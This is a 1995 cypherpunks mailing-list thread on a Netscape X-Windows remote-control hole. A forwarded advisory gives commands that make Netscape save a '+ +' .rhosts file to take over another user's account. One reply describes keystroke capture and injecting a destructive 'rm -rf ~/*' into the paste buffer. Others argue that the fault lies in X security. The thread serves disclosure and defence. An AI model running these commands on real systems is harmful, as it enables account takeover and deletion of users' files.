Netscape hole without .Xauthority (fwd)
Haven't seen this on the cypherpunks yet, sorry if this has been here already. Juri <o Jüri Kaljundi e-mail: jk@digit.ee o<
o tel: +372 6308994 o> <o DigiTurg http://www.digit.ee/ o<
---------- Forwarded message ---------- There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients. Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security. Let's suppose that you have an account on a target machine, where somebody is using Netscape, and either the xhost checking is disabled, or you can set the xhost yourself (e.g. if you have an account and the target user has no .Xauthority, as is frequent in university computer rooms). Then you can gain access to the target user's account using the following steps : - make a text file containing only "+ +" accessible (as file, as URL, or whatever you like) to the target Netscape client. This is quite easy, either if you have a personal WWW page (http://... URL) or an account on the target machine (file://... URL), or even by uploading it to an anon FTP - set your DISPLAY environment variable to the target display - run the following set of commands : netscape -noraise -remote "openURL(<put-your-URL-here>)" netscape -noraise -remote "saveAs(.rhosts)" netscape -noraise -remote back In the second command, the path should be specified whenever possible (~ is not accepted). If the target user does not already have a .rhosts and is not looking at that precise moment, then the chances are it worked ! Solution to the problem : every user concerned should either create a Xauthority file, or stop using Netscape. MXK PS: WHY do they bother with PGP and RSA security when they keep such holes ???? +------------------------------------+---------------------------------+ | Denis AUROUX (MXK) | Ecole Normale Superieure | | 255 rue Saint-Jacques | 45 rue d'Ulm | | 75005 PARIS FRANCE | 75005 PARIS | | email: auroux@clipper.ens.fr | FRANCE | +------------------------------------+---------------------------------+ | This .sig is SHAREWARE. If you use it often, please send me $50. | | After registering you will receive a fully functional .sig and all | | updates for free. | +----------------------------------------------------------------------+
If your X server is not secure, then your pass phrases are not secure. If your pass phrases are not secure then private keys are compromised. If your private keys are compromised ... She swallowed a fly! Perhaps, she'll die. PK -- Philip L. Karlton karlton@netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation
In message <Pine.3.89.9509291503.A1295-0100000@jamarillo>, Jyri Kaljundi writes : [...]
There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients.=20 Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security. [...] PS: WHY do they bother with PGP and RSA security when they keep such holes = ????
Well, I would susspect that because if your X server isn't "secure" there isn't much you can do that is. Other then xterm, most X programs will respond to "synthetic" events (events gennerated by another programs as opposed to the user), this means with a little work anyone with access to the X server could click open the File menu, select "Open URL", type in a URL, press "Open", click "SaveAs", and so on. Even if all X clients stoped listening to synthetic events (which would be a shame - since they are useful in various contexts) X's event structure allows multiple X cleints to lissten for tthe same events on the same windows, so a simple program could track all keystrokes and capature your passwords. Failing all of that any X client could track ownership of the X selection (the "cut buffer" normally used to hold text), and when it looks like a Unix command (implying that you will be pasting it into the command line) assert ownership of the selection itself and put in "^X^U^H;rm -rf ~/*" followed by a carrage return. That's just off the top of my head ('tho I admit I have written two of the three "exploits" while I was a sysadmin 4 years ago in an effort to convinse my managers to mandate better security then "xhost +"...). So saying "Netscape isn't secure when my X server isn't" is alot like saying "When I leave the front door of my house unlocked my VCR isn't safe!". -- Not speaking for my employer, or anyone other then myself.
That's called an X hole, not a netscape hole.
Haven't seen this on the cypherpunks yet, sorry if this has been here=20 already.=20
Juri
<o J=FCri Kaljundi e-mail: jk@digit.ee o<
o tel: +372 6308994 o> <o DigiTurg http://www.digit.ee/ o<
---------- Forwarded message ----------
There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients.=20 Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security.
Let's suppose that you have an account on a target machine, where somebody is using Netscape, and either the xhost checking is disabled, or you can set the xhost yourself (e.g. if you have an account and the target user has no .Xauthority, as is frequent in university computer rooms). Then you can gain access to the target user's account using the following steps :
- make a text file containing only "+ +" accessible (as file, as URL, or whatever you like) to the target Netscape client. This is quite easy, eit= her if you have a personal WWW page (http://... URL) or an account on the target machine (file://... URL), or even by uploading it to an anon FTP
- set your DISPLAY environment variable to the target display
- run the following set of commands :
netscape -noraise -remote "openURL(<put-your-URL-here>)" netscape -noraise -remote "saveAs(.rhosts)" netscape -noraise -remote back
In the second command, the path should be specified whenever possible=20 (~ is not accepted).
If the target user does not already have a .rhosts and is not looking at th= at precise moment, then the chances are it worked !
Solution to the problem : every user concerned should either create a=20 Xauthority file, or stop using Netscape.
=09MXK
PS: WHY do they bother with PGP and RSA security when they keep such holes = ????
+------------------------------------+---------------------------------+ | Denis AUROUX (MXK) | Ecole Normale Superieure | | 255 rue Saint-Jacques | 45 rue d'Ulm | | 75005 PARIS FRANCE | 75005 PARIS | | email: auroux@clipper.ens.fr | FRANCE | +------------------------------------+---------------------------------+ | This .sig is SHAREWARE. If you use it often, please send me $50. | | After registering you will receive a fully functional .sig and all | | updates for free. | +----------------------------------------------------------------------+
-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer@c2.org
Jyri Kaljundi wrote:
There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients. Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security.
Did you bother to read the spec? This doesn't matter; if I can connect to your X server at all, you have already lost. The spec (at http://home.netscape.com/newsref/std/x-remote.html) contains: SECURITY CONCERNS Any client which can connect to your X server can control a Netscape Navigator process running there; authenticating the originator of the request is beyond the scope of this protocol. It is assumed that the underlying X security mechanisms will prevent unauthorized people from accessing your server. It is important (in general) that everyone be aware of the security risks associated with allowing unlimited access to your X server. Regardless of whether you use Netscape Navigator, allowing arbitrary users and hosts access to your X server is a gaping security hole. If hostile forces an connect to your server, it is trivially easy for them to execute arbitrary shell commands as you, read and write any of your files, and watch every character you type. Again, this has nothing to do with Netscape Navigator. It is a property of the X Window System. If you have turned off security on your X server with the xhost + command, or if you have announced that a host is ``trusted'' by using xhost or by listing that host in your /etc/X0.hosts file, then you should be aware of the consequences. If this causes access to be possible from a host which is not, in fact, trusted, then you have left your doors wide open. For more information about the security mechanisms one can use with an X server, consult the manual pages for X(1), Xsecurity(1), xauth(1), and xhost(1), or talk to your system administrator. -- Jamie Zawinski jwz@netscape.com http://www.netscape.com/people/jwz/ ``A signature isn't a return address, it is the ASCII equivalent of a black velvet clown painting; it's a rectangle of carets surrounding a quote from a literary giant of weeniedom like Heinlein or Dr. Who.'' -- Chris Maeda
| Jyri Kaljundi wrote: | > | > There's a huge hole in the Netscape remote control mechanism for the | > X-Windows based clients. | > Potential impact : anybody can become any user that uses Netscape on any | > system without sufficient X security. | | Did you bother to read the spec? This doesn't matter; if I can | connect to your X server at all, you have already lost. The spec | (at http://home.netscape.com/newsref/std/x-remote.html) contains: [snip] This is all true, in a way. But there is a growing number of applications that contains this kind of remote execution capabilities, and whose security is dependant on Xauth. I believe that X is soon becoming the weakest link in the security chain. I guess we don't have to discuss the quality of the 'magic cookie' RNG's, do we? Not to mention the fact that the cookie is in effect a password that is perfectly snoopable. How common is DES-based Xauth-schemes? They are not used very much, as far as I know. And if theyare, as in XDM, then again, what about the RNG? I guess this is just the distinction of breaking the glass window in the back of the house, or to pick up the front door key from beneath the "Welcome" door mat, but anyway. -Christian
good points, Christian! more and more, networks are becoming flooded with X traffic. although X has always been known to be a potential security hole, i think X-attacks are going to increase dramatically in the coming months. i commonly hear of sights with Xauthority enabled, only to have the user community type "xhost +" at the prompt. bad karma. the days of pumping rude & crass noises to someone else's workstation will soon graduate to more nefarious and insidious attacks. is anyone looking into a means of securing X (above and beyond the current weak solutions)? regards, --robert -- o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o o vox: 708.435.7076 fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o
participants (7)
-
Christian Wettergren -
Jamie Zawinski -
Josh M. Osborne -
Jyri Kaljundi -
karlton -
rthomas@pamd.cig.mot.com -
sameer